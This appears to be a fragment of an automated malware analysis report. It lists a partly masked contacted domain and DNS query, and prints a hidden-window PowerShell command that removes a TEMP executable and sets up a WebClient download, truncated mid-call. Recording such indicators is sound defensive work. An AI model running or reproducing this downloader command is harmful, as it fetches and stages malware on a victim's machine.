Technical Information
- 'al###ayah.com':80
- DNS ASK al###ayah.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -noprofile If (test-path $env:TEMP + '\dr.exe') {Remove-Item $env:TEMP + '\dr.exe'}; $now = New-Object System.Net.WebClient; $now.Headers['User-Agent'] = 'newUser'; $now.D...' (with hidden window)